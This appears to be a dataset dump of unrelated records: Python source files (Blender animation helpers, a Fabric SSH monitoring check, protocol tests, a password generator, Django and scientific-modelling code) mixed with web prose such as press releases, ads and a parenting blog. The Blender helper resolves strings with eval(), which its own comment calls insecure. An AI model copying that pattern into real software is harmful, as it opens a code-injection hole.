text
stringlengths 29
850k
|
---|
import bpy
def get_full_data_path(bpy_obj):
return repr(bpy_obj)
def get_bpy_obj_from_data_path(data_path):
## TODO: this is hackish and insecure
return eval(data_path)
def get_active_strip(context=None):
if context is None:
context = bpy.context
return context.scene.sequence_editor.active_strip
def get_fcurve(scene, data_path):
action = scene.animation_data.action
if action is None:
return None
for fc in action.fcurves:
if fc.data_path == data_path:
return fc
def create_fcurve(scene, data_path, action_group=''):
action = scene.animation_data.action
if action is None:
return None
return action.fcurves.new(data_path, action_group=action_group)
def get_or_create_fcurve(scene, data_path, action_group=''):
fc = get_fcurve(scene, data_path)
if fc is not None:
return fc
return create_fcurve(scene, data_path, action_group)
def set_keyframe(fcurve, frame, value, interpolation='CONSTANT'):
kf = fcurve.keyframe_points.insert(frame, value)
kf.interpolation = interpolation
return kf
def get_keyframe(fcurve, *frames):
if len(frames) > 1:
keyframes = []
else:
keyframes = None
for kf in fcurve.keyframe_points:
if kf.co[0] in frames:
if keyframes is not None:
keyframes.append(kf)
else:
return kf
return keyframes
def iter_keyframes(**kwargs):
fcurves = kwargs.get('fcurves')
if fcurves is None:
scene = kwargs.get('scene')
action = scene.animation_data.action
fcurves = action.fcurves
for fc in fcurves:
for kf in fc.keyframe_points:
yield kf, fc
def get_keyframe_dict(**kwargs):
d = {}
for kf, fc in iter_keyframes(**kwargs):
frame = kf[0]
if frame not in d:
d[frame] = {}
d[frame][fc.data_path] = {'keyframe':kf, 'fcurve':fc}
return d
class MultiCamContext:
@classmethod
def poll(cls, context):
if context.area.type != 'SEQUENCE_EDITOR':
return 0
active_strip = get_active_strip(context)
if active_strip is None:
return 0
if active_strip.type != 'MULTICAM':
return 0
return 1
def get_strip(self, context):
return get_active_strip(context)
|
The upcoming graphic novel Dishonored: The Peeress and the Price will continue the events of the Dishonored series with its release on February 20.
Players most recently visited the world of Corvo Attano and Emily Kaldwin in 2016’s Dishonored 2 (and the series as a whole in last year’s Death of the Outsider), and luckily those looking to engage with more of Arkane Studios’ world won’t have to wait too much longer thanks to a new graphic novel based on the series.
The novel is being written by comic writer Michael Moreci (Roche Limit), drawn by Andrea Olimpieri (Dishonored Volume 1, True Blood), and colored by Mattia Iacono (Dark Souls). |
from fabric.api import hide, run, env
import time
import json
def run_cmd(cmd):
with hide('output', 'running', 'warnings'):
return run(cmd, timeout=1200)
def check(**kwargs):
''' Login over SSH and execute shell command '''
jdata = kwargs['jdata']
logger = kwargs['logger']
env.gateway = jdata['data']['gateway']
env.host_string = jdata['data']['host_string']
env.user = jdata['data']['username']
env.key = jdata['data']['sshkey']
env.shell = "/bin/sh -c"
env.disable_known_hosts = True
env.warn_only = True
env.abort_on_prompts = True
results = run_cmd("uname -a")
if results.succeeded:
if "FreeBSD" in results:
cmd = "vmstat 2 2"
results = run_cmd(cmd)
if results.succeeded:
lines = results.splitlines()
vmstat_info = lines[-1].split()
cpu_idle = float(vmstat_info[-1])
else:
return None
else:
cmd = "vmstat 2 2"
results = run_cmd(cmd)
if results.succeeded:
lines = results.splitlines()
vmstat_info = lines[-1].split()
cpu_idle = float(vmstat_info[-3])
else:
return None
else:
return None
threshold = float(jdata['data']['threshold'])
logger.debug("cpu-idle: Idle {0} Threshold {1}".format(cpu_idle, threshold))
if cpu_idle > threshold:
return True
else:
return False
|
Monte Carlo, Monaco – 15 April 2019 – Global luxury brand, Ralph & Russo, continues its retail expansion with its first European flagship opening within Monaco’s prestigious One-Monte Carlo complex, designed by award winning architect, Sir Richard Rogers, and situated in the heart of Monaco’s golden triangle. Home to leading luxury brands, the opening of the Monaco boutique closely follows the unveiling of the brand’s other flagships in Doha, Qatar and Dubai, UAE, with additional boutiques expected to launch globally in key destinations over the next year.
CEO, Michael Russo, comments: “Monaco is the ultimate luxury destination and home to the world’s leading designer brands. We are excited to be opening in such an international hub, which attracts residents and visitors from all over Europe and beyond”.
Measuring near 250 m2 and set over two floors, the boutique is testament to excellence in craftsmanship and architectural savoir faire, boasting an exquisite sculptural staircase at its core and an entirely bespoke interior, as designed and personally defined by Creative Director, Tamara Ralph.
Ralph comments: “Monaco is such a special and prestigious region. It was so important to us that our Monte Carlo boutique not only reflected the brand, but also the grandeur of its location”.
Encased by 4,700 alternating metallic strips and illuminated by a breathtaking jeweled Murano glass chandelier, the staircase leads to a private lounge on the lower level, offering a unique client experience and orchestrating the perfect balance between visibility and privacy. The ground floor, in contrast, mirrors the feeling of Monaco with a more open atmosphere.
Enhanced by Nero Marquine and Carrara marble flooring, rose gold coiled brass furnishings and hues of silver grey, the boutique interiors reinterpret traditional yacht design, featuring elements of curvature throughout and offering an overall sensory experience. Ralph further comments: “The beauty of the Cote d’Azur and the yachts that inhabit it are so integral to the identity of Monaco. In designing the boutique I really wanted to celebrate the region’s maritime history alongside the contemporary splendour of the yachting community today”.
Home to a selection of the brand’s ready-to-wear, leather goods, accessories as well as a limited selection of exclusive couture pieces, the Ralph & Russo boutique is now open at One-Monte Carlo, Monaco. |
from __future__ import print_function, unicode_literals
import mock
from twisted.trial import unittest
from ..._dilation.connection import (parse_record, encode_record,
KCM, Ping, Pong, Open, Data, Close, Ack)
class Parse(unittest.TestCase):
def test_parse(self):
self.assertEqual(parse_record(b"\x00"), KCM())
self.assertEqual(parse_record(b"\x01\x55\x44\x33\x22"),
Ping(ping_id=b"\x55\x44\x33\x22"))
self.assertEqual(parse_record(b"\x02\x55\x44\x33\x22"),
Pong(ping_id=b"\x55\x44\x33\x22"))
self.assertEqual(parse_record(b"\x03\x00\x00\x02\x01\x00\x00\x01\x00"),
Open(scid=513, seqnum=256))
self.assertEqual(parse_record(b"\x04\x00\x00\x02\x02\x00\x00\x01\x01dataaa"),
Data(scid=514, seqnum=257, data=b"dataaa"))
self.assertEqual(parse_record(b"\x05\x00\x00\x02\x03\x00\x00\x01\x02"),
Close(scid=515, seqnum=258))
self.assertEqual(parse_record(b"\x06\x00\x00\x01\x03"),
Ack(resp_seqnum=259))
with mock.patch("wormhole._dilation.connection.log.err") as le:
with self.assertRaises(ValueError):
parse_record(b"\x07unknown")
self.assertEqual(le.mock_calls,
[mock.call("received unknown message type: {}".format(
b"\x07unknown"))])
def test_encode(self):
self.assertEqual(encode_record(KCM()), b"\x00")
self.assertEqual(encode_record(Ping(ping_id=b"ping")), b"\x01ping")
self.assertEqual(encode_record(Pong(ping_id=b"pong")), b"\x02pong")
self.assertEqual(encode_record(Open(scid=65536, seqnum=16)),
b"\x03\x00\x01\x00\x00\x00\x00\x00\x10")
self.assertEqual(encode_record(Data(scid=65537, seqnum=17, data=b"dataaa")),
b"\x04\x00\x01\x00\x01\x00\x00\x00\x11dataaa")
self.assertEqual(encode_record(Close(scid=65538, seqnum=18)),
b"\x05\x00\x01\x00\x02\x00\x00\x00\x12")
self.assertEqual(encode_record(Ack(resp_seqnum=19)),
b"\x06\x00\x00\x00\x13")
with self.assertRaises(TypeError) as ar:
encode_record("not a record")
self.assertEqual(str(ar.exception), "not a record")
|
Over the last month or so Ebi-kun has had an annoying cough, it isn't a deep chesty cough, he sounds like he is continuously cleaning his throat. So we have been going to the doctor and trying out various medications to figure out what it is. Last week I had to take him everyday to go on the nebuliser and the end of the week he ended up having a steroid IV.
The poor kid has been going to school but hasn't been sleeping well so he was exhausted, the IV does appear to be working, they also took blood to run tests to see if anything showed up.
We went back yesterday, my husband was back from Germany so we all went. family outing to the doctors, who-hoo. The blood tests didn't show anything odd so the doc decided to give him another IV and some more syrup and tablets. Now, don't be alarmed at this photo, this is Ebi-kun doing his 'I am really poorly' face, I should get him on the TV, little actor!
I have to say, he is the perfect patient. Didn't even flinch when the nurse took blood and put the IV in, watched everything she was doing and even asked her questions. It reminded me of when he broke his arm, as soon as we went in to get an x-ray, he stopped crying and started asking the technician loads of questions about the x-ray machine. The poor technician was completely bemused!
So, now we wait and see. He has been sleeping better the last couple of nights, maybe the cooler weather has helped too. One funny thing that did happen at the clinic, the doc speaks a bit of English, I always make sure I speak slowly and try to use Japanese if I can. Yesterday, my husband was with us and the doc suddenly came out with perfect English, proper long sentences, not basic sentences and odd words like he had been using all week, couldn't believe it! I still don't understand why he wasn't talking to us in Japanese, very amusing.
My boy had the same for a few weeks back in April when he started the shougako. they thought that it could be asthma but finally he was fine. I hope Ebi-kun gets well soon. |
#!/usr/bin/env python
# vim: fdm=marker
"""
pyssword - Password generator
Generates a random password with a specified entropy within specified character
sets. Uses /dev/urandom for random info by default.
Usage:
pyssword [--lower --upper --numbers --symbols --entropy=bits --no-info]
pyssword --read [--lower --upper --numbers --symbols --entropy=bits --no-info --radix=radix --one-based]
pyssword --die=radix [--lower --upper --numbers --symbols --entropy=bits --no-info]
pyssword passphrase [--entropy=bits --no-info]
pyssword passphrase --read [--entropy=bits --no-info --radix=radix --one-based]
pyssword passphrase --die=radix [--entropy=bits --no-info]
pyssword passphrase --info
pyssword --help
Options:
passphrase
Output a passphrase instead of a password. All characters are in
lowercase. This uses the EFF's long list, as described in
https://www.eff.org/deeplinks/2016/07/new-wordlists-random-passphrases
-e bits --entropy=bits
[Default: 128]
The entropy, in bits, of the password. This is a minimum value; the
final entropy may be a bit higher than specified due to a round up for
an integral number of random inputs.
-l --lower
Use lowercase letters.
-u --upper
Use uppercase letters.
-n --numbers
Use numbers.
-s --symbols
Use symbols.
--info
Ask for a passphrase (a white-space separated list of words of the
current word list) from stdin. If connected to a terminal, the user
will be prompted to enter the passphrase. Any word not in the word
list will cause an error.
Outputs the passphrase info.
--no-info
Print only the password, without additional info.
-r --read
Ask for random information instead of relying on /dev/urandom. Numbers
are collected from stdin until enough entropy has been achieved. If
connected to a terminal, the user will be prompted to manually enter
random numbers.
Note: In platforms which have no /dev/urandom, this is the only way to
use the script.
You can use any source of random data. But keep in mind that in this
case the strength of the generated password is entirely dependent on
the random nature of the numbers provided. The best way to do so is to
use real, fair dice, and to actually throw them for getting random
input values. Also, numbers are not assumed to be given in base-10 by
default (see `--radix').
When connecting stdin to a pipe, there's the possibility of not enough
numbers be provided, in which case the script will just block
endlessly, waiting for input. Be sure to provide enough input in such
cases. For the math inclined, the minimum quantity of numbers needed
for a given radix and entropy (in bits) is:
total = round_up(entropy_bits / log(radix, 2))
Or you can just run the program without a pipe and wait for it to ask
you for numbers. The prompt has the actual quantity of expected
numbers. With this information, cancel it (Control-C) and try again
using a pipe.
--radix=radix
[Default: 256]
The radix used for random input numbers. Only used if `--read' is
given. Values range from 0 up to but excluding `radix' (see
`--one-based' for ranging values from 1 up to and including `radix').
-1 --one-based
Whether or not numbers are zero- or one- based. They are assumed to be
zero-based by default.
-d radix --die=radix
Treat input as a die with `radix' sides. Shortcut for `--read',
`--radix=radix' and `--one-based'.
-h --help
Show this.
Examples:
Without arguments, all characters are used to compute a password with the
default entropy (lowercase, uppercase, numbers and symbols):
$ pyssword --no-info
&I3`?)R0h0Co0H[>k)|\\
You can restrict the characters used and use a specific entropy:
$ pyssword --lower --numbers --entropy 64 --no-info
azs99hrimiov0g
By default, that is, without --no-info, additional information is shown:
$ pyssword --entropy 30
Actual entropy: 32.772944258388186
Set length: 94
Password: h+!:4
The full character set has 94 letters/numbers/symbols.
The source of random information can be changed. For using 16 bytes (that
is, 128 bits) from /dev/random do the following:
$ dd if=/dev/random bs=16 count=1 2>/dev/null | od -t u1 -A n -v | pyssword --read --no-info
)PN"GgyF%`#TdlI3IweV
Using real dice with six sides for generating a 26-bit passphrase:
$ pyssword passphrase --read --radix 6 --one-based --entropy 26
1/11: 1 2 3 4 5 6 1 2 3 4 5
Actual entropy: 28.434587507932722
Set length: 7776
Password: abacus dispatch arousal
The same as above, using the shortcut option --die:
$ pyssword passphrase --die 6 --entropy 26
1/11: 1 2 3 4 5 6 1 2 3 4 5
Actual entropy: 28.434587507932722
Set length: 7776
Password: abacus dispatch arousal
The same as above, using a pipe and without info:
$ cat - > /tmp/rolls
1 2 3 4 5 6 1 2 3 4 5
<Control-D>
$ cat /tmp/rolls | pyssword passphrase -d 6 -e 26 --no-info
abacus dispatch arousal
$ shred -u /tmp/rolls
Note: the three examples above returned three words, but the resulting
entropy is not 38.8 (each word in Dicerware list provides about 12.9 bits,
which is what you can get from a list with 7776 words). This happens
because in order to get at least 26 bits of entropy eleven die rolls are
needed, but then you'll get 28.4 bits. This value exceeds the entropy
provided by only two words (25.8 bits), and a third one is needed for
accounting for the difference and also to satisfy the requirement of at
least 26 bits. The entropy which exists is the same that gets in: no
entropy is created out of thin air, and the script makes its best efforts
to also not waste it.
"""
from math import ceil, log
import docopt
import itertools
import os
import pkg_resources
import random
import sys
WORDS = []
wordsfile = pkg_resources.resource_stream(
__name__,
'eff_large_wordlist.txt'
)
for wordline in wordsfile:
_base6index, word = wordline.rstrip().split(b'\t')
WORDS.append(word.decode('us-ascii'))
FULL = [chr(v) for v in range(33, 127)]
UPPER = [chr(v) for v in range(65, 65 + 26)]
LOWER = [chr(v) for v in range(97, 97 + 26)]
NUMBERS = [chr(v) for v in range(48, 48 + 10)]
SYMBOLS = list(set(FULL) - set(NUMBERS) - set(UPPER) - set(LOWER))
class IntOption:
def __init__(self, args, option):
self.option = option
try:
self.value = int(args[option])
except ValueError:
error("{} is not a valid integer".format(option))
def get(self):
return self.value
def greater_than(self, min):
if self.value <= min:
error("{} must be greater than {}".format(self.option, min))
return self
def less_than(self, max):
if self.value >= max:
error("{} must be less than {}".format(self.option, max))
return self
class Number:
def __init__(self, radix, digits):
assert radix > 1
for digit in digits:
assert 0 <= digit < radix
self._radix = radix
self._digits = digits
self.max_within_length = radix**len(digits)
self.bits = log(self.max_within_length, 2)
def convert(self, radix):
n = 0
exp = 0
minlength = ceil(log(self.max_within_length, radix))
for digit in reversed(self._digits):
n += digit * (self._radix**exp)
exp += 1
if n == 0:
digits = [0]
else:
digits = []
while n:
r = n % radix
n = n // radix
digits.append(r)
padding = [0] * max(minlength - len(digits), 0)
return self.__class__(radix, padding + list(reversed(digits)))
def __iter__(self):
return iter(self._digits)
class TokenSet(tuple):
def __new__(cls, tokens):
if len(tokens) < 2:
error("Not enough tokens to choose from. Use a longer set.")
return tuple.__new__(cls, tokens)
@property
def bits(self):
return log(len(self), 2)
def select(self, number):
return [self[i] for i in number.convert(len(self))]
class Password:
def __init__(self, tokenset, number, separator):
self.set = tokenset
self.entropy = number.bits
self.value = tokenset.select(number)
self.separator = separator
def __str__(self):
return self.separator.join(self.value)
def error(message):
print(message)
sys.exit(1)
def run(args):
is_passphrase = args['passphrase']
if is_passphrase:
tokens = WORDS
else:
tokens = []
tokens.extend(args['--lower'] and LOWER or [])
tokens.extend(args['--upper'] and UPPER or [])
tokens.extend(args['--numbers'] and NUMBERS or [])
tokens.extend(args['--symbols'] and SYMBOLS or [])
tokens = tokens if len(tokens) else FULL
assert len(tokens) == len(set(tokens))
tokenset = TokenSet(tokens)
if args['--die']:
args['--read'] = True
args['--radix'] = args['--die']
args['--one-based'] = True
if args['--info']:
radix = len(tokens)
generator, entropy = read_words(tokens)
else:
entropy = IntOption(args, '--entropy').greater_than(0).get()
if args['--read']:
radix = IntOption(args, '--radix').greater_than(1).get()
generator = user_generator(entropy, radix, args['--one-based'])
else:
rng = random.SystemRandom()
radix = len(tokens)
generator = random_generator(rng, radix)
total = ceil(entropy / log(radix, 2))
inputs = list(itertools.islice(source(generator), total))
number = Number(radix, inputs)
pw = Password(tokenset, number, ' ' if is_passphrase else '')
if args['--no-info']:
print(pw)
else:
print("Actual entropy: {}\n"
"Set length: {}\n"
"Password: {}"
"".format(pw.entropy, len(pw.set), pw))
def random_generator(rng, radix):
while True:
yield rng.randrange(radix)
def user_generator(desired_entropy, radix, onebased):
total = ceil(desired_entropy / log(radix, 2))
promptsize = 2 * len(str(total)) + len('/')
count = 0
offset = -1 if onebased else 0
def readline(line):
values = line.strip().split(' ')
try:
values = [int(value) + offset for value in values if value]
except:
values = []
yield from (v for v in values if 0 <= v < radix)
while True:
if sys.stdin.isatty():
prompt = '{}/{}'.format(count + 1, total)
print(prompt.rjust(promptsize), end=': ')
sys.stdout.flush()
for value in readline(sys.stdin.readline()):
count += 1
yield value
def read_words(tokens):
if sys.stdin.isatty():
print('Enter words separated by space', end=': ')
sys.stdout.flush()
values = []
for word in sys.stdin.readline().strip().split(' '):
try:
values.append(tokens.index(word))
except ValueError:
error("{} is not part of the word list.".format(word))
return (values, log(len(tokens)**len(values), 2))
def source(*inputs):
return itertools.chain(*[iter(input) for input in inputs])
def main():
try:
return run(docopt.docopt(__doc__))
except KeyboardInterrupt:
return 1
if __name__ == '__main__':
sys.exit(main())
|
Lamar University's bachelor's degree in communication with an emphasis in broadcasting offers you valuable hands-on experience fresh out of high school, an opportunity most students would love to have elsewhere!
Our program is designed to give you a strong foundation and even stronger experience. You'll take courses in digital editing, audio production, TV writing and performing and television field production, among others.
We strongly encourage participation in Lamar University Television (LUTV) and KVLU Public Radio. Our graduates have worked at CBS, ESPN, CNN , BET, and Disney, and often work in key positions.
LUTV on Fox production featuring an interview with outgoing Lamar president James M. "Jimmy" Simmons.
Evan West conducts an in-depth interview with Bill Macatee, Lamar alumnus and CBS sports anchor.
Download the broadcasting track degree plan. |
##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2017 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from ckeditor.fields import RichTextField
from django.conf import settings
from django.db import models
from django.db.models import F
from django.utils.translation import gettext_lazy as _
from ordered_model.admin import OrderedModelAdmin
from ordered_model.models import OrderedModel
class AbstractEducationGroupAchievementAdmin(OrderedModelAdmin):
list_display = ('code_name', 'order', 'move_up_down_links')
readonly_fields = ['order']
search_fields = ['code_name', 'order']
class AbstractEducationGroupAchievementQuerySet(models.QuerySet):
def annotate_text(self, language_code):
return self.annotate(
text=F('french_text') if language_code == settings.LANGUAGE_CODE_FR else F('english_text')
)
class AbstractEducationGroupAchievement(OrderedModel):
external_id = models.CharField(max_length=100, blank=True, null=True, db_index=True)
changed = models.DateTimeField(null=True, auto_now=True)
code_name = models.CharField(max_length=100, verbose_name=_('code'))
english_text = RichTextField(null=True, verbose_name=_('text in English'))
french_text = RichTextField(null=True, verbose_name=_('text in French'))
class Meta:
abstract = True
objects = AbstractEducationGroupAchievementQuerySet.as_manager()
|
Go Birds! Beautiful Hand Stamped Solid Pewter with "Fly Eagles Fly". Includes Hand Wrapped Green and Black Swarovski Crystals and Football and Wing Charm. Expandable Bangle is Solid Stainless Steel and never tarnishes. All jumprings are stainless steel and also never tarnish. Charms are lead free and nickel free. Comes with gorgeous gift box. Order today while the season is hot! |
#!/usr/bin/env python3
from tsdb import TSDBServer
from tsdb.persistentdb import PersistentDB
import timeseries as ts
import tkinter as tk
identity = lambda x: x
schema = {
'pk': {'convert': identity, 'index': None,'type':str}, #will be indexed anyways
'ts': {'convert': identity, 'index': None},
'order': {'convert': int, 'index': 1,'type':int},
'blarg': {'convert': int, 'index': 1,'type' : int},
'useless': {'convert': identity, 'index': None, 'type' : str},
'mean': {'convert': float, 'index': 1,'type' : float},
'std': {'convert': float, 'index': 1, 'type' : float},
'vp': {'convert': bool, 'index': 1, 'type' : bool}
}
#schema = {
# 'pk': {'convert': identity, 'index': None, 'type':str}, #will be indexed anyways
# 'ts': {'convert': identity, 'index': None},
#}
NUMVPS = 5
def main(load=False, dbname="db", overwrite=False, threshold = 10, wordlength = 16, tslen = 256, cardinality = 64):
# we augment the schema by adding columns for 5 vantage points
#for i in range(NUMVPS):
# schema["d_vp-{}".format(i)] = {'convert': float, 'index': 1}
db = PersistentDB(schema, 'pk',load=load, dbname=dbname, overwrite=overwrite, threshold = threshold, wordlength = wordlength, tslen = tslen, cardinality = cardinality)
server = TSDBServer(db)
server.run()
if __name__=='__main__':
class SampleApp(tk.Tk):
def __init__(self):
tk.Tk.__init__(self)
self.destroy()
self.master = tk.Tk()
self.master2 = None
self.label = tk.Label(self.master,text="""
This is a brief introduction to the similarity search for time series
using the iSAX index.
In the next window you will be asked to input some values. The first
determines whether to load or not the database from some existing database.
You will next be asked to provide a database name for loading or writing.
Next, whether to overwrite the existing database, in the event that one of
the given name exists. You will further be asked to give the cardinality of
the iSAX representation to be used, which is essentially the number of vertical
slices into which you wish the time series to be divided for indexing.
Cardinalities greater than 64 are not supported at the moment. The next
value is a threshold, the number of time series to hold in a leaf node. Then the
world length, so the number of segments or horizontal slices for indexing the
time series. Finally, please provide the time series length, which is the number
of data points you wish your time series to be interpolated to for uniformization
of the time series. These interpolation points will be evenly spaced between the
maximum and minimum time values, including the endpoints. If no values are input
defaults will be used. Defaults are indicated by [...].
""",justify = 'left')
self.button = tk.Button(self.master, text="continue", command=self.on_button)
self.label.pack()
self.button.pack()
def on_button(self):
if self.master2:
self.master2.destroy()
else:
self.master.destroy()
self.card = 64
self.dbn = "db"
self.th = 10
self.wl = 8
self.tslen = 256
self.master1 = tk.Tk()
self.label2 = tk.Label(self.master1,text="Load (true or false) [False]: ")
self.entry2 = tk.Entry(self.master1)
self.label3 = tk.Label(self.master1,text="Database name (no spaces) [db]: ")
self.entry3 = tk.Entry(self.master1)
self.label4 = tk.Label(self.master1,text="Overwrite (true or false) [False]: ")
self.entry4 = tk.Entry(self.master1)
self.label1 = tk.Label(self.master1,text="Cardinality (must be a power of 2) [64]: ")
self.entry1 = tk.Entry(self.master1)
self.label5 = tk.Label(self.master1,text="Threshold (must be a positive integer) [10]: ")
self.entry5 = tk.Entry(self.master1)
self.label6 = tk.Label(self.master1,text="Word length (must be a power of 2) [8]: ")
self.entry6 = tk.Entry(self.master1)
self.label7 = tk.Label(self.master1,text="Time series length (must be a power of 2) [256]: ")
self.entry7 = tk.Entry(self.master1)
self.button = tk.Button(self.master1, text="continue", command=self.on_button1)
self.label2.pack()
self.entry2.pack()
self.label3.pack()
self.entry3.pack()
self.label4.pack()
self.entry4.pack()
self.label1.pack()
self.entry1.pack()
self.label5.pack()
self.entry5.pack()
self.label6.pack()
self.entry6.pack()
self.label7.pack()
self.entry7.pack()
self.button.pack()
def on_button1(self):
self.master2 = tk.Tk()
card = self.entry1.get()
if card:
try:
self.card = int(card)
except:
self.label_1 = tk.Label(self.master2,text="Please enter a number for the cardinality.")
self.button1 = tk.Button(self.master2, text="continue", command=self.on_button)
self.master1.destroy()
self.label_1.pack()
self.button1.pack()
self.ld = self.entry2.get()
if self.ld:
if self.ld[0].lower() == 't':
self.ld = True
else:
self.ld = False
else:
self.ld = False
dbn = self.entry3.get()
if dbn:
self.dbn = dbn
self.ovrw = self.entry4.get()
if self.ovrw:
if self.ovrw[0].lower() == 't':
self.ovrw = True
else:
self.ovrw = False
else:
self.ovrw = False
th = self.entry5.get()
wl = self.entry6.get()
tslen = self.entry7.get()
if th:
try:
self.th = int(th)
except:
self.label_1 = tk.Label(self.master2,text="Please enter a number for the threshold.")
self.button1 = tk.Button(self.master2, text="continue", command=self.on_button)
self.master1.destroy()
self.label_1.pack()
self.button1.pack()
if wl:
try:
self.wl = int(wl)
except:
self.label_1 = tk.Label(self.master2,text="Please enter a number for the word length.")
self.button1 = tk.Button(self.master2, text="continue", command=self.on_button)
self.master1.destroy()
self.label_1.pack()
self.button1.pack()
if tslen:
try:
self.tslen = int(tslen)
except:
self.label_1 = tk.Label(self.master2,text="Please enter a number for the time series length.")
self.button1 = tk.Button(self.master2, text="continue", command=self.on_button)
self.master1.destroy()
self.label_1.pack()
self.button1.pack()
self.label_1 = tk.Label(self.master2,text="Is the following correct?\n\nLoad: "+str(self.ld)+'\n\nDatabase name: '+str(self.dbn)+'\n\nOverwrite: '+str(self.ovrw)+'\n\nCardinality: '+str(self.card)+'\n\nThreshold: '+str(self.th)+'\n\nWord length: '+str(self.wl)+'\n\nTime series length: '+str(self.tslen)+'\n\n',justify = 'left')
self.button1 = tk.Button(self.master2, text="yes", command=self.on_button2)
self.button2 = tk.Button(self.master2, text="no", command=self.on_button)
self.master1.destroy()
self.label_1.pack()
self.button1.pack(side='right')
self.button2.pack(side='right')
def on_button2(self):
self.master2.destroy()
main(load=self.ld, dbname=self.dbn, overwrite=self.ovrw, threshold = self.th, wordlength = self.wl, tslen = self.tslen, cardinality = self.card)
app = SampleApp()
app.mainloop()
|
Saratoga Springs: Are You On Team Yanny Or Team Laurel?
Weigh in on the latest meme to break the internet.
If you’re on social media all day long—it’s part of my job, so I have a good excuse—you tend to see quite a few memes go viral. Whether it be hashtag games on Twitter or image-based creations on Facebook, memes are a fun distraction during a grueling work day. Like that multi-colored dress that broke the internet in 2015. Man, I spent way too much time trying to figure that one out. It broke my brain.
But when I just listened to the clip above, all I could hear was “Laurel.” I’m now afraid that I’ve gone completely insane. Or that there are two different recordings out there, and I just fell for another piece of fake (audio) news. CNN believes it has scientific proof which answer is the correct one. Please, help me make up my mind once and for all, Saratoga! |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Copyright (c) 2012 Michael Hull.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------
from morphforge.simulation.base.networks import SynapticTrigger
from morphforge.simulation.base.networks import PreSynapticTypes
from morphforge.traces.eventset import EventSet
class SynapticTriggerByVoltageThreshold(SynapticTrigger):
def __init__(self, cell_location, voltage_threshold, delay, **kwargs):
super(SynapticTriggerByVoltageThreshold, self).__init__(**kwargs)
self.cell_location = cell_location
self.voltage_threshold = voltage_threshold
self.delay = delay
def get_presynaptic_cell_location(self):
return self.cell_location
def get_presynaptic_cell(self):
return self.cell_location.cell
def get_type(self):
return PreSynapticTypes.Cell
def get_summary_string(self):
return '%s: [threshold: %s]'%( self.cell_location.get_location_description_str(), self.voltage_threshold )
class SynapticTriggerAtTimes(SynapticTrigger):
def __init__(self, time_list, **kwargs):
super(SynapticTriggerAtTimes, self).__init__(**kwargs)
# Convert into an event set
if not isinstance(time_list, EventSet):
time_list = EventSet(time_list)
self.time_list = time_list
def get_presynaptic_cell(self):
return None
def get_type(self):
return PreSynapticTypes.FixedTiming
def get_summary_string(self):
return 'At times: %s (ms)'%( self.time_list.times_in_np_array_ms() )
|
The following people will be filling the pulpit during our time of transition.
They will be in attendance to deliver the sermon, take note, and join us!
Dr. Lombard serves our church as an Elder and Trustee as well as a former Moderator. David is a retired psychologist having worked in both private and hopital based practice, in addition to teaching at Wright State University.
Cliff has been a member of FCC for more than 20 years. He has served as Deacon, Elder, Vice-Moderator, Men’s Ministries Chair, Property Committee Chair, and Leader of the A/V Team. Cliff currently serves as Chairman of the Elders.
Carol is an Ordained Minister in the Christian Church(Disciples of Christ).Carol is the Pastor of Assimilation at Legacy Christian Church In Harrison, Ohio. Carol also serves on the Commission on Ministry and the Camp Christian Committee for the Christian Church In Ohio.Carol served as Associate Pastor at FCC-Middletown for 13 years. Carol also served Walnut Hills Christian Church as Co-Pastor.
Reverend Ed Bastien Serves as the Pastoral Care Manager at Atrium Medical Center. Rev. Bastien holds a Masters of Divinity in Theology and Religious Vocations from Asbury Theological Seminary. Ed has experience in Chaplaincy from both The Hospital as well as Hospice settings. |
"""
==================================
The :mod:`mpi_array.locale` Module
==================================
Defines :obj:`LndarrayProxy` class and factory functions for
creating multi-dimensional arrays where memory is allocated
using :meth:`mpi4py.MPI.Win.Allocate_shared` or :meth:`mpi4py.MPI.Win.Allocate`.
Classes
=======
..
Special template for mpi_array.locale.LndarrayProxy to avoid numpydoc
documentation style sphinx warnings/errors from numpy.ndarray inheritance.
.. autosummary::
:toctree: generated/
:template: autosummary/inherits_ndarray_class.rst
lndarray - Sub-class of :obj:`numpy.ndarray` which uses MPI allocated memory buffer.
.. autosummary::
:toctree: generated/
:template: autosummary/class.rst
LndarrayProxy - Thin container for :obj:`lndarray` which provides convenience views.
PartitionViewSlices - Container for per-rank slices for created locale extent array views.
Factory Functions
=================
.. autosummary::
:toctree: generated/
empty - Create uninitialised array.
